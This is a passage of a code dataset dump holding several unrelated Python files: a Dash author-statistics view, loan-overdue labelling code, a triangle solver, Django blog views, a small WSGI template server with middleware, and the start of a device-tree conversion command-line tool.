'whiteSpace': 'normal',\n \"word-break\": \"break-word\",\n 'height': 'auto',\n 'minWidth': '10px', 'width': '90px', 'maxWidth': '200px',\n },\n data=df_papers.to_dict(\"rows\"),\n columns=[{\"name\": i, \"id\": i} for i in df_papers.columns],\n \n style_data_conditional=[ \n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': 'rgb(248, 248, 248)'\n }\n ],\n \n style_cell_conditional=[\n {\n 'if': {'column_id': 'Abstract'},\n 'width': '30%'\n },\n {\n 'if': {'column_id': 'ID'},\n 'width': '5%'\n },\n {\n 'if': {'column_id': 'Title'},\n 'width': '10%'\n },\n {\n 'if': {'column_id': 'Year'},\n 'width': '5%'\n },\n {\n 'if': {'column_id': 'Cites'},\n 'width': '5%'\n }\n ],\n \n style_header={\n 'backgroundColor': 'rgb(230, 230, 230)',\n 'fontWeight': 'bold'\n },\n # To edit elements\n #columns=[{\"name\": i, \"id\": i, \"editable\": False if i == \"id\" else True} for i in df.columns],\n editable=False,\n row_deletable=False,\n page_size= 10,\n )\n # N papers\n n_papers = len(papers)\n # Get years\n years = []\n for paper in papers:\n years.append(paper[4])\n fig_papers_year = go.Figure(go.Histogram(x=years, xbins=dict(start=1950, end=2021, size=1)))\n fig_papers_year.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Year published\", yaxis_title=\"Papers\")\n # Get abstracts\n abstracts = []\n for paper in papers:\n abstracts.append(paper[2])\n # Topic modelling\n topics = topic_modelling(abstracts)\n # Common words\n words, count_words = common_words(abstracts)\n fig_common_words = go.Figure(go.Bar(x=count_words, y=words, orientation=\"h\"))\n fig_common_words.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Count\", yaxis_title=\"Word\")\n # Common bigrams\n bigrams, count_bigrams = common_bigrams(abstracts)\n fig_common_bigrams = go.Figure(go.Bar(x=count_bigrams, y=bigrams, orientation=\"h\"))\n fig_common_bigrams.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Count\", yaxis_title=\"Bigram\")\n # Common speech tagging\n tags, count_tags = common_speech_tagging(abstracts)\n fig_common_tags = go.Figure(go.Bar(x=count_tags, y=tags, orientation=\"h\"))\n fig_common_tags.update_layout(margin=dict(l=0, r=0, t=5, b=0), xaxis_title=\"Count\", yaxis_title=\"Tag\")\n\n # Plot layout\n if author != []:\n plot = html.Div([\n dcc.Tabs([\n dcc.Tab(\n html.Div([\n html.Br(),\n html.Div([\n html.Div([\n html.Img(src=url_picture),\n ],id=\"author-picture\"),\n html.Div([\n html.H4(name),\n html.H5(affiliation),\n html.P(email),\n html.P(f\"Cites: {citedby}\"),\n html.P(f\"Papers published: {n_papers}\"),\n html.P(f\"Cites/Papers: {citedby/n_papers:.3f}\"),\n html.P(f\"Interests: {interests}\")\n ], id=\"author-data\")\n ], className=\"row\")\n ]), label=\"Description\"\n ),\n dcc.Tab(\n html.Div(table),label=\"Papers\"\n ),\n dcc.Tab(\n dcc.Tabs([\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_cites_year, config={ 'displayModeBar': False}, responsive=True)\n ]), label=\"Cited by year\"\n ),\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_papers_year, config={ 'displayModeBar': False}, responsive=True)\n ]), label=\"Papers by year\"\n ),\n ]), label = \"Year\"\n ),\n dcc.Tab(\n html.Div([\n html.Iframe(srcDoc=str(topics), id=\"iframe-topic\")\n ], id=\"topic-div\"), label=\"Topic\"\n ),\n dcc.Tab(\n dcc.Tabs([\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_common_words, config={ 'displayModeBar': False}, responsive=True)\n ], id=\"common-words-div\"), label=\"Words\"\n ),\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_common_bigrams, config={ 'displayModeBar': False}, responsive=True)\n ], id=\"common-bigrams-div\"), label=\"Bigrams\"\n ),\n dcc.Tab(\n html.Div([\n dcc.Graph(figure=fig_common_tags, config={ 'displayModeBar': False}, responsive=True)\n ], id=\"common-tags-div\"), label=\"Speech Tagging\"\n )\n ]), label=\"Frequency\"\n )\n ])\n ])\n return plot\n else:\n return None\n ","sub_path":"system/components/controller/author.py","file_name":"author.py","file_ext":"py","file_size_in_byte":8310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"102182101","text":"import datetime as dt\nimport json\nimport logging\nimport re\n\nimport numpy as np\nimport pandas as pd\nfrom dateutil.relativedelta import relativedelta\n\nfrom clean_data import CleanOverdue, CleanLoan\n\n\nclass Reference(object):\n maxcap_date = dt.datetime(year=2019, month=1, day=1)\n\n def __init__(self, report_no, overdue_df, loan_df):\n self.report_no = report_no\n self.overdue_df = overdue_df\n self.loan_df = loan_df\n\n self.loan = None\n self.overdue = None\n self.loan_overdue = None\n\n self.reference_account = None\n self.reference_date = None\n\n self.label_loan = None\n\n self.logger = logging.getLogger('master.reference')\n\n def clean_overdue(self):\n result_overdue = self.overdue_df[[\n 'OverdueDetailAccount', 'OverdueDetailMon',\n 'OverdueDetailLatestMons', 'OverdueDetailAmt'\n ]]\n\n result_overdue = result_overdue.astype(\n dtype={\n 'OverdueDetailAccount': object,\n 'OverdueDetailMon': dt.datetime,\n 'OverdueDetailLatestMons': float,\n 'OverdueDetailAmt': float\n })\n return result_overdue\n\n def clean_loan(self, loan):\n if len(loan) == 0:\n result_loan = pd.DataFrame(columns=[\n 'LoanAccount', 'LoanCue', 'LoanFinanceType', 'LoanFinanceOrg',\n 'LoanType', 'LoanCurrency', 'LoanOpenDate', 'LoanEndDate',\n 'LoanLimitAmt', 'LoanGuaranType', 'LoanPayRating',\n 'LoanPayCyc', 'LoanBadBalance', 'LoanStateEndDate',\n 'LoanStateEndMon', 'LoanBeginMon', 'LoanEndMon',\n 'LoanLatest24State', 'LoanBalance', 'LoanRemainPayCyc',\n 'LoanScheduledPayAmt', 'LoanNewEndDate'\n ])\n\n else:\n result_loan = loan[[\n 'LoanAccount', 'LoanCue', 'LoanFinanceType', 'LoanFinanceOrg',\n 'LoanType', 'LoanCurrency', 'LoanOpenDate', 'LoanEndDate',\n 'LoanLimitAmt', 'LoanGuaranType', 'LoanPayRating',\n 'LoanPayCyc', 'LoanBadBalance', 'LoanStateEndDate',\n 'LoanStateEndMon', 'LoanBeginMon', 'LoanEndMon',\n 'LoanLatest24State', 'LoanBalance', 'LoanRemainPayCyc',\n 'LoanScheduledPayAmt'\n ]]\n\n new_loan_end_date_list = []\n for loan_account in list(loan['LoanAccount']):\n loan_sub = loan[loan['LoanAccount'] == loan_account]\n loan_latest_24_state = loan_sub['LoanLatest24State'].iloc[0]\n loan_end_date = loan_sub['LoanEndDate'].iloc[0]\n loan_state_end_date = loan_sub['LoanStateEndDate'].iloc[0]\n\n if loan_latest_24_state == '':\n loan_new_end_date = loan_state_end_date\n elif loan_end_date > loan_state_end_date:\n loan_new_end_date = loan_end_date\n else:\n loan_new_end_date = self.maxcap_date\n new_loan_end_date_list.append(loan_new_end_date)\n tmp_df = pd.DataFrame({\n 'LoanAccount': list(loan['LoanAccount']),\n 'LoanNewEndDate': new_loan_end_date_list\n })\n result_loan = pd.merge(result_loan, tmp_df, on='LoanAccount')\n\n result_loan = result_loan.astype(\n dtype={\n 'LoanAccount': object,\n 'LoanCue': object,\n 'LoanFinanceType': object,\n 'LoanFinanceOrg': object,\n 'LoanType': object,\n 'LoanCurrency': object,\n 'LoanOpenDate': dt.datetime,\n 'LoanEndDate': dt.datetime,\n 'LoanLimitAmt': float,\n 'LoanGuaranType': object,\n 'LoanPayRating': object,\n 'LoanPayCyc': float,\n 'LoanBadBalance': float,\n 'LoanStateEndDate': dt.datetime,\n 'LoanStateEndMon': dt.datetime,\n 'LoanBeginMon': dt.datetime,\n 'LoanEndMon': dt.datetime,\n 'LoanLatest24State': object,\n 'LoanBalance': float,\n 'LoanRemainPayCyc': float,\n 'LoanScheduledPayAmt': float,\n 'LoanNewEndDate': dt.datetime\n })\n\n return result_loan\n\n def updated_overdue(self):\n # generate current overdue info using latest24 state\n current_loan_accounts = list(self.loan[\n ~self.loan['LoanLatest24State'].isnull()]['LoanAccount'].unique())\n\n overdue_latest24_loan = pd.DataFrame()\n if len(current_loan_accounts) > 0:\n for account in current_loan_accounts:\n pattern = re.compile('[1-7]')\n latest24 = str(self.loan[self.loan['LoanAccount'] == account][\n 'LoanLatest24State'].iloc[0])\n overdue_detail_month_list = []\n overdue_detail_last_months_list = []\n for m in pattern.finditer(latest24):\n overdue_detail_last_months_list.append(m.group())\n overdue_detail_month_list.append(\n self.loan[self.loan['LoanAccount'] ==\n account]['LoanBeginMon'].iloc[0] +\n relativedelta(months=m.start()))\n overdue_latest24_loan_sub = pd.DataFrame({\n 'OverdueDetailAccount':\n account,\n 'OverdueDetailMon':\n overdue_detail_month_list,\n 'OverdueDetailLatestMons':\n overdue_detail_last_months_list,\n 'OverdueDetailAmt':\n np.nan\n })\n overdue_latest24_loan = overdue_latest24_loan.append(\n overdue_latest24_loan_sub)\n\n overdue_latest24 = pd.concat([overdue_latest24_loan])\n\n # merge current (latest24) overdue info with historical (5 years) overdue info\n updated_overdue = self.clean_overdue().append(overdue_latest24)\n updated_overdue.dropna(\n subset=[\n 'OverdueDetailAccount', 'OverdueDetailMon',\n 'OverdueDetailLatestMons'\n ],\n how='all',\n inplace=True)\n updated_overdue['OverdueDetailLatestMons'] = updated_overdue[\n 'OverdueDetailLatestMons'].astype(float)\n updated_overdue.sort_values(\n by=['OverdueDetailAccount', 'OverdueDetailMon'], inplace=True)\n updated_overdue.reset_index(drop=True, inplace=True)\n return updated_overdue\n\n def clean_loan_overdue(self):\n result_loan_overdue = pd.merge(\n self.loan,\n self.overdue,\n left_on='LoanAccount',\n right_on='OverdueDetailAccount',\n how='left')\n del result_loan_overdue['OverdueDetailAccount']\n result_loan_overdue = result_loan_overdue.astype(\n dtype={\n 'OverdueDetailMon': dt.datetime,\n 'OverdueDetailLatestMons': float,\n 'OverdueDetailAmt': float\n })\n result_loan_overdue.dropna(how='all', inplace=True)\n result_loan_overdue.sort_values(\n by=[\n 'LoanOpenDate', 'LoanAccount', 'OverdueDetailMon',\n 'OverdueDetailAmt'\n ],\n ascending=[True, True, True, False],\n inplace=True)\n result_loan_overdue.reset_index(drop=True, inplace=True)\n return result_loan_overdue\n\n def reference(self, overdue_sub):\n if len(overdue_sub) > 0:\n reference_account_list = []\n reference_date_list = []\n for account in overdue_sub['LoanAccount'].unique():\n reference_account_list.append(account)\n reference_date_list.append(\n self.loan_overdue.loc[self.loan_overdue['LoanAccount'] ==\n account, 'LoanOpenDate'].iloc[0])\n\n reference_df = pd.DataFrame(\n {\n 'ReferenceAccount': reference_account_list,\n 'ReferenceDate': reference_date_list,\n },\n columns=['ReferenceAccount', 'ReferenceDate'])\n\n elif len(self.loan[~self.loan['LoanLatest24State'].isnull()]) != 0:\n reference_account_list = []\n reference_date_list = []\n for account in self.loan['LoanAccount'].unique():\n if self.loan.loc[self.loan['LoanAccount'] == account,\n 'LoanLatest24State'].isnull().iloc[0] == 0:\n reference_account_list.append(account)\n reference_date_list.append(self.loan.loc[self.loan[\n 'LoanAccount'] == account, 'LoanOpenDate'].iloc[0])\n\n reference_df = pd.DataFrame(\n {\n 'ReferenceAccount': reference_account_list,\n 'ReferenceDate': reference_date_list,\n },\n columns=['ReferenceAccount', 'ReferenceDate'])\n else:\n reference_account_list = []\n reference_date_list = []\n for account in self.loan['LoanAccount'].unique():\n reference_account_list.append(account)\n reference_date_list.append(self.loan.loc[self.loan[\n 'LoanAccount'] == account, 'LoanOpenDate'].iloc[0])\n\n reference_df = pd.DataFrame(\n {\n 'ReferenceAccount': reference_account_list,\n 'ReferenceDate': reference_date_list,\n },\n columns=['ReferenceAccount', 'ReferenceDate'])\n\n reference_df.sort_values(\n by=['ReferenceDate', 'ReferenceAccount'],\n ascending=[False, False],\n inplace=True)\n reference = reference_df.iloc[0]\n return reference\n\n def sample_selection(self, loan_state, loan_class5_state, loan_type,\n loan_guaran_type, loan_limit_amt):\n loan0 = self.loan_df\n\n if loan_state == 'all':\n loan1 = loan0\n else:\n try:\n loan1 = loan0[loan0['LoanState'].isin(loan_state)]\n except Exception:\n return 'please input correct loan_state'\n\n if loan_class5_state == 'all':\n loan2 = loan1\n else:\n try:\n loan2 = loan1[loan1['LoanClass5State'].isin(loan_class5_state)]\n except Exception:\n return 'please input correct loan_class5_state'\n\n if loan_type == 'all':\n loan3 = loan2\n else:\n try:\n loan3 = loan2[loan2['LoanType'].isin(loan_type)]\n except Exception:\n return 'please input correct loan_type'\n\n if loan_guaran_type == 'all':\n loan4 = loan3\n else:\n try:\n loan4 = loan3[loan3['LoanGuaranType'].isin(loan_guaran_type)]\n except Exception:\n return 'please input correct LoanGuaranType'\n\n if loan_limit_amt == 'all':\n loan5 = loan4\n else:\n try:\n loan5 = loan4[(loan4['LoanLimitAmt'] >= loan_limit_amt[0])\n & (loan4['LoanLimitAmt'] <= loan_limit_amt[-1])]\n except Exception:\n return 'please input correct LoanLimitAmt'\n\n self.loan = self.clean_loan(loan5)\n self.overdue = self.updated_overdue()\n self.loan_overdue = self.clean_loan_overdue()\n\n def blacklist_selection(self, overdue_last_months, overdue_amount):\n overdue_sub0 = self.loan_overdue\n\n if overdue_last_months == 'all':\n overdue_sub1 = overdue_sub0\n else:\n try:\n overdue_sub1 = overdue_sub0[\n (overdue_sub0['OverdueDetailLatestMons'] >=\n overdue_last_months[0])\n & (overdue_sub0['OverdueDetailLatestMons'] <=\n overdue_last_months[-1])]\n except Exception:\n return 'please input correct overdue_last_months'\n\n if overdue_amount == 'all':\n overdue_sub2 = overdue_sub1\n else:\n try:\n overdue_sub2 = overdue_sub1[\n (overdue_sub1['OverdueDetailAmt'] >= overdue_amount[0])\n & (overdue_sub1['OverdueDetailAmt'] <= overdue_amount[-1])]\n except Exception:\n return 'please input correct overdue_amount'\n self.reference_account, self.reference_date = self.reference(\n overdue_sub2)\n if len(overdue_sub2) > 0:\n self.label_loan = 1\n else:\n self.label_loan = 0\n\n def update_loan_overdue(self):\n data = self.loan_overdue[\n self.loan_overdue['LoanOpenDate'] <= self.reference_date]\n data1 = data[~data['OverdueDetailMon'].isnull()]\n data2 = data[data['OverdueDetailMon'].isnull()]\n result = pd.DataFrame()\n result = result.append(data2)\n for loan_accounts in data1['LoanAccount'].unique():\n data_sub = data1[data1['LoanAccount'] == loan_accounts]\n if min(data_sub['OverdueDetailMon']) > self.reference_date:\n data_sub['OverdueDetailAmt'] = np.nan\n data_sub['OverdueDetailLatestMons'] = np.nan\n data_sub['OverdueDetailMon'] = np.datetime64('nat')\n result = result.append(data_sub.iloc[0])\n else:\n result = result.append(data_sub[\n data_sub['OverdueDetailMon'] <= self.reference_date])\n\n result = result[result['LoanAccount'] != self.reference_account]\n result.sort_values(\n by=[\n 'LoanOpenDate', 'LoanAccount', 'OverdueDetailMon',\n 'OverdueDetailAmt'\n ],\n ascending=[True, True, True, False],\n inplace=True)\n result.reset_index(drop=True, inplace=True)\n return result\n\n\nif __name__ == '__main__':\n\n logger = logging.getLogger('master')\n logger.setLevel(logging.INFO)\n\n handler = logging.FileHandler('data/reference_20180314.log', mode='w')\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n logger.warning('####program start####')\n\n result_all = pd.DataFrame()\n with open('data/sample_data_20180307_v0.1.json', 'rb') as f:\n for n, i in enumerate(f):\n if n % 100 == 0:\n print(n)\n data = json.loads(i)\n loan_df = pd.DataFrame(\n data['ICRLoanInfo'],\n columns=[\n 'LoanAccount', 'LoanActualPayAmt', 'LoanBadBalance',\n 'LoanBalance', 'LoanBeginMon', 'LoanClass5State',\n 'LoanCue', 'LoanCurrOverdueAmt', 'LoanCurrOverdueCyc',\n 'LoanCurrency', 'LoanEndDate', 'LoanEndMon',\n 'LoanFinanceOrg', 'LoanFinanceType', 'LoanGuaranType',\n 'LoanID', 'LoanLatest24State', 'LoanLimitAmt',\n 'LoanOpenDate', 'LoanPayCyc', 'LoanPayRating',\n 'LoanRecentPayDate', 'LoanRemainPayCyc',\n 'LoanScheduledPayAmt', 'LoanScheduledPayDate', 'LoanState',\n 'LoanStateEndDate', 'LoanStateEndMon', 'LoanType',\n 'LoanbizType', 'Overdue31To60Amt', 'Overdue61To90Amt',\n 'Overdue91To180Amt', 'OverdueOver180Amt'\n ])\n overdue_df = pd.DataFrame(\n data['ICRLatest5YearOverdueDetail'],\n columns=[\n 'OverdueDetailAccount', 'OverdueDetailAmt',\n 'OverdueDetailID', 'OverdueDetailLatestMons',\n 'OverdueDetailMon'\n ])\n report_no = data['ICRHeader'][0]['ReportNo']\n logger.info('{}_{}'.format(n, report_no))\n\n loan_df_1 = CleanLoan(loan_df).clean_columns()\n overdue_df_1 = CleanOverdue(overdue_df).clean_columns()\n\n reference = Reference(report_no, overdue_df_1, loan_df_1)\n reference.sample_selection(\n loan_state='all',\n loan_class5_state='all',\n loan_type='all',\n loan_guaran_type='all',\n loan_limit_amt='all')\n reference.blacklist_selection(\n overdue_last_months='all', overdue_amount='all')\n\n result = reference.update_loan_overdue()\n result['ReportNo'] = report_no\n result['ReferenceAccount'] = reference.reference_account\n result['ReferenceDate'] = reference.reference_date\n result['LabelLoan'] = reference.label_loan\n\n result_all = result_all.append(result)\n # break\n\n # result_all.replace(np.nan, 0, inplace=True)\n result_all.reset_index(drop=True, inplace=True)\n\n result_all.to_csv(\n 'data/reference_loan_account_info_20180314.csv',\n index=False,\n encoding='utf8')\n\n logger.warning('####program end####')\n\n handlers = logger.handlers[:]\n for handler in handlers:\n handler.close()\n logger.removeHandler(handler)\n","sub_path":"reference_loan_tianfu.py","file_name":"reference_loan_tianfu.py","file_ext":"py","file_size_in_byte":17435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"194492163","text":"'''Functions for seeing what to calculate and calling the appropriate functions to\r\ncalculate angles and side lengths\r\nIMPORTANT: Angles must be given in radians and angles are returned in radians\r\n'''\r\n\r\nimport sine, cosine\r\n\r\n\r\n# Sees what to solve and solves the angles/sides using sine\r\ndef solve_sine(a=0, b=0, c=0, A=0, B=0, C=0):\r\n if a != 0 and A != 0:\r\n other_angle = A\r\n other_side = a\r\n elif b != 0 and B != 0:\r\n other_angle = B\r\n other_side = b\r\n elif c != 0 and C != 0:\r\n other_angle = C\r\n other_side = c\r\n else:\r\n raise Exception('other_side and other_angle could not be assigned. Not enough angles and sides.')\r\n\r\n if a != 0 and A == 0:\r\n return a, b, c, sine.solve_angle(a, other_angle, other_side), B, C\r\n elif b != 0 and B == 0:\r\n return a, b, c, A, sine.solve_angle(b, other_angle, other_side), C\r\n elif c != 0 and C == 0:\r\n return a, b, c, A, B, sine.solve_angle(c, other_angle, other_side)\r\n\r\n elif a == 0 and A != 0:\r\n return sine.solve_side(A, other_angle, other_side), b, c, A, B, C\r\n elif b == 0 and B != 0:\r\n return a, sine.solve_side(B, other_angle, other_side), c, A, B, C\r\n elif c == 0 and C != 0:\r\n return a, b, sine.solve_side(C, other_angle, other_side), A, B, C\r\n\r\n return a, b, c, A, B, C\r\n\r\n\r\n# Sees what to solve and solves the angles/sides using cosine\r\ndef solve_cosine(a=0, b=0, c=0, A=0, B=0, C=0):\r\n if a == 0 and A != 0 and b != 0 and c != 0:\r\n return cosine.solve_opposite(b, c, A), b, c, A, B, C\r\n elif b == 0 and B != 0 and a != 0 and c != 0:\r\n return a, cosine.solve_opposite(a, c, B), c, A, B, C\r\n elif c == 0 and C != 0 and a != 0 and b != 0:\r\n return a, b, cosine.solve_opposite(a, b, C), A, B, C\r\n\r\n elif A == 0 and a != 0 and b != 0 and c != 0:\r\n return a, b, c, cosine.solve_angle(b, c, a), B, C\r\n elif B == 0 and a != 0 and b != 0 and c != 0:\r\n return a, b, c, A, cosine.solve_angle(a, c, b), C\r\n elif C == 0 and a != 0 and b != 0 and c != 0:\r\n return a, b, c, A, B, cosine.solve_angle(a, b, c)\r\n\r\n return a, b, c, A, B, C\r\n\r\n","sub_path":"TriSolver/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"31083086","text":"from django.contrib.auth import login\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom datetime import datetime\n\nfrom django.core.paginator import Paginator\nfrom django.http import Http404\nfrom django.shortcuts import redirect, render\nfrom django.views import View\nfrom django.views.generic import DetailView\n\nfrom blogs.forms import SignUpForm, PostForm, BlogForm\n\nfrom blogs.models import Post, Category, Blog\n\n\ndef home(request):\n now = datetime.now()\n all_post = Post.objects.filter(publish_date__lte=now).order_by(\"-publish_date\")\n context = {'posts': all_post}\n return render(request, \"home.html\", context)\n\n\ndef user_posts_list(request, nombre_usuario):\n now = datetime.now()\n # Categorias para el filtro\n categories = Category.objects.all().order_by(\"name\")\n posts_list = Post.objects.filter(user__username=nombre_usuario, publish_date__lte=now).order_by(\"-publish_date\")\n # Información para la cabecera del blog\n try:\n blog_info = Blog.objects.get(user__username=nombre_usuario)\n except:\n return render(request, \"404.html\")\n paginator = Paginator(posts_list, 5)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n context = {'posts': posts, 'blog': blog_info, 'categories': categories, 'owner': nombre_usuario}\n return render(request, \"my_blog.html\", context)\n\n\ndef blogs_list(request):\n all_blogs = Blog.objects.filter().order_by(\"blog_name\")\n return render(request, \"blogs_list.html\", {\"blogs\": all_blogs})\n\n\ndef search_categories(request):\n now = datetime.now()\n # Categorias para el filtro\n categories = Category.objects.all().order_by(\"name\")\n username = request.GET.get('owner')\n idcat = request.POST.get('categoria')\n if idcat == '0':\n posts_list = Post.objects.filter(user__username=username, publish_date__lte=now).order_by(\"-publish_date\")\n else:\n posts_list = Post.objects.filter(categories__in=[idcat], user__username=username,\n publish_date__lte=now).order_by(\"-publish_date\")\n paginator = Paginator(posts_list, 5)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n context = {'posts': posts, 'owner': username, 'categories': categories}\n return render(request, \"my_blog.html\", context)\n\n\nclass SignUpView(View):\n\n def get(self, request):\n formUser = SignUpForm()\n formBlog = BlogForm()\n return render(request, \"signup.html\", {\"formUser\": formUser, \"formBlog\": formBlog})\n\n def post(self, request):\n user_form = SignUpForm(request.POST)\n blog_form = BlogForm(request.POST)\n if user_form.is_valid() and blog_form.is_valid():\n # User save from form\n user = user_form.save()\n user.blog.blog_name = blog_form.instance.blog_name\n user.blog.blog_description = blog_form.instance.blog_description\n user.save()\n # User autenctication\n login(request, user)\n return redirect(\"home_page\")\n return render(request, \"signup.html\", {\"formUser\": user_form, \"formBlog\": blog_form})\n\n\nclass CreatePostView(LoginRequiredMixin, View):\n\n login_url = \"/login\"\n\n def get(self, request):\n form = PostForm()\n return render(request, \"create_post_form.html\", {\"form\": form})\n\n def post(self, request):\n post = Post()\n post.user = request.user #select user autenticated\n form = PostForm(request.POST, request.FILES, instance=post)\n if form.is_valid():\n form.save()\n return redirect(\"home_page\")\n return render(request, \"create_post_form.html\", {\"form\": form})\n\n\nclass PostDetailView(DetailView):\n\n model = Post\n template_name = 'post_detail.html'\n\n def get_queryset(self):\n query = super(PostDetailView, self).get_queryset()\n now = datetime.now()\n return query.filter(publish_date__lte=now)\n\n def get(self, request, *args, **kwargs):\n try:\n self.object = self.get_object()\n except Http404:\n # redirect here\n return render(request,\"404.html\")\n context = self.get_context_data(object=self.object)\n return self.render_to_response(context)","sub_path":"src/blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"204451517","text":"import os\nfrom jinja2 import Template, Environment, FileSystemLoader\n\ntopDiv = \"
Middleware TOP
\"\nbottomDiv = \"
Middleware BOTTOM
\"\nopenTag = \"\"\ncloseTag = \"\"\nenv = Environment(loader=FileSystemLoader(['./', './about']))\n\ndef App(environ, start_response):\n filepath = '.' + environ['PATH_INFO']\n print(filepath)\n if (filepath == './' or filepath == './index.html' or filepath == './about/about.html'):\n template = env.get_template(filepath)\n start_response('200 OK', [('Content-type', 'text/HTML')])\n return [template.render(name=filepath.split('/')[1]).encode('utf-8')]\n else:\n start_response('404 Not Found', [(\"Content-Type\", \"text/html\")])\n return ['File not found!'.encode()]\n \nclass Middleware(object):\n def __init__(self, app):\n self.app = app\n \n def __call__(self, environ, start_response):\n text = self.app(environ, start_response)[0].decode('utf-8')\n if text.find(openTag) != -1:\n text = text[:(text.find(openTag)+len(openTag))] + topDiv + text[(text.find(openTag)+len(openTag)):]\n print(text)\n if text.find(closeTag) != -1:\n text = text[:text.find(closeTag)] + bottomDiv + text[text.find(closeTag):]\n return [text.encode()]\n\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n app = Middleware(App)\n _server = make_server('localhost', 8000, app)\n print (\"Serving localhost on port 8000...\")\n _server.serve_forever()","sub_path":"wsgi_server.py","file_name":"wsgi_server.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"546521538","text":"#!/usr/bin/env python\n\n# Copyright 2017 Martin Olejar\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport fdt\nimport click\n\n# Application error code\nERROR_CODE = 1\n\n# The version of u-boot tools\nVERSION = fdt.__version__\n\n# Short description of DTC tool\nDESCRIP = (\n \"Device Tree Converter tool for converting FDT blob (*.dtb) to readable text file (*.dts) and reverse\"\n)\n\n\n# Base options\n@click.group(context_settings=dict(help_option_names=['-?', '--help']), help=DESCRIP)\n@click.version_option(VERSION, '-v', '--version')\ndef cli():\n click.echo()\n\n\n@cli.command(short_help=\"Convert *.dtb to *.dts\")\n@click.argument('infile', nargs=1, type=click.Path(exists=True))\n@click.option('-t', '--tabsize', type=click.INT, default=4, show_default=True, help=\"Tabulator Size\")\n@click.option('-o', '--outfile', type=click.Path(), default=None, help=\"Output path/file name (*.dts)\")\ndef todts(outfile, infile, tabsize):\n \"\"\" Convert device tree binary blob (*.dtb) into readable text file (*.dts) \"\"\"\n fdt_obj = None\n\n if outfile is None:\n outfile = os.path.splitext(os.path.basename(infile))[0] + \".dts\"\n\n try:\n with open(infile, 'rb') as f:\n try:\n fdt_obj = fdt.parse_dtb(f.read())\n except:\n raise Exception('Not supported file format: {}'.format(infile))\n\n with open(outfile, 'w') as f:\n f.write(fdt_obj.to_dts(tabsize))\n\n except Exception as e:\n click.echo(\" Error: {}\".format(str(e) if str(e) else \"Unknown!\"))\n sys.exit(ERROR_CODE)\n\n click.secho(\" DTS saved as: %s\" % outfile)\n\n\n@cli.command(short_help=\"Convert *.dts to *.dtb\")\n@click.argument('infile', nargs=1, type=click.Path(exists=True))\n@click.option('-v', '--version', type=click.INT, default=None, help=\"DTB Version\")\n@click.option('-l', '--lcversion', type=click.INT, default=None, help=\"DTB Last Compatible Version\")\n@click.option('-c', '--cpuid', type=click.INT, default=None, help=\"Boot CPU ID\")\n@click.option('-a', '--align', type=click.INT, default=None, help=\"Make the blob align to the \")\n@click.option('-p', '--padding', type=click.INT, default=None, help=\"Add padding to the blob of long\")\n@click.option('-s', '--size', type=click.INT, default=None, help=\"Make the blob at least long\")\n@click.option('-o', '--outfile', type=click.Path(), default=None, help=\"Output path/file name (*.dtb)\")\ndef todtb(outfile, infile, version, lcversion, cpuid, align, padding, size):\n \"\"\" Convert device tree as readable text file (*.dts) into binary blob (*.dtb) \"\"\"\n fdt_obj = None\n\n if outfile is None:\n outfile = os.path.splitext(os.path.basename(infile))[0] + \".dtb\"\n\n try:\n if version is not None and version > fdt.Header.MAX_VERSION:\n raise Exception(\"DTB Version must be lover or equal {} !\".format(fdt.Header.MAX_VERSION))\n\n with open(infile, 'r') as f:\n try:\n fdt_obj = fdt.parse_dts(f.read(), os.path.dirname(infile))\n except:\n raise Exception('Not supported file format: {}'.format(infile))\n\n raw_data = fdt_obj.to_dtb(version, lcversion, cpuid)\n\n if align is not None:\n if size is not None:\n raise Exception(\"The \\\"-a/--align\\\" option can't be used together with \\\"-s/--size\\\"\")\n if not align % 2:\n raise Exception(\"The \\\"-a/--align\\\" option must be dividable with two !\")\n if len(raw_data) % align:\n raw_data += bytes([0] * (len(raw_data) % align))\n\n if padding is not None:\n if align is not None:\n raise Exception(\"The \\\"-p/--padding\\\" option can't be used together with \\\"-a/--align\\\"\")\n raw_data += bytes([0] * padding)\n\n if size is not None:\n if size < len(raw_data):\n raise Exception(\"The \\\"-s/--size\\\" option must be > {}\".format(len(raw_data)))\n raw_data += bytes([0] * (size - len(raw_data)))\n\n with open(outfile, 'wb') as f:\n f.write(raw_data)\n\n except Exception as e:\n click.echo(\" Error: {}\".format(str(e) if str(e) else \"Unknown!\"))\n sys.exit(ERROR_CODE)\n\n click.secho(\" DTB saved as: %s\" % outfile)\n\n\n@cli.command(short_help=\"Merge two and more *.dtb or *.dts files\")\n@click.argument('outfile', nargs=1, type=click.Path())\n@click.argument('infiles', nargs=-1, type=click.Path(exists=True))\n@click.option('-t', '--tabsize', type=click.INT, default=4, show_default=True, 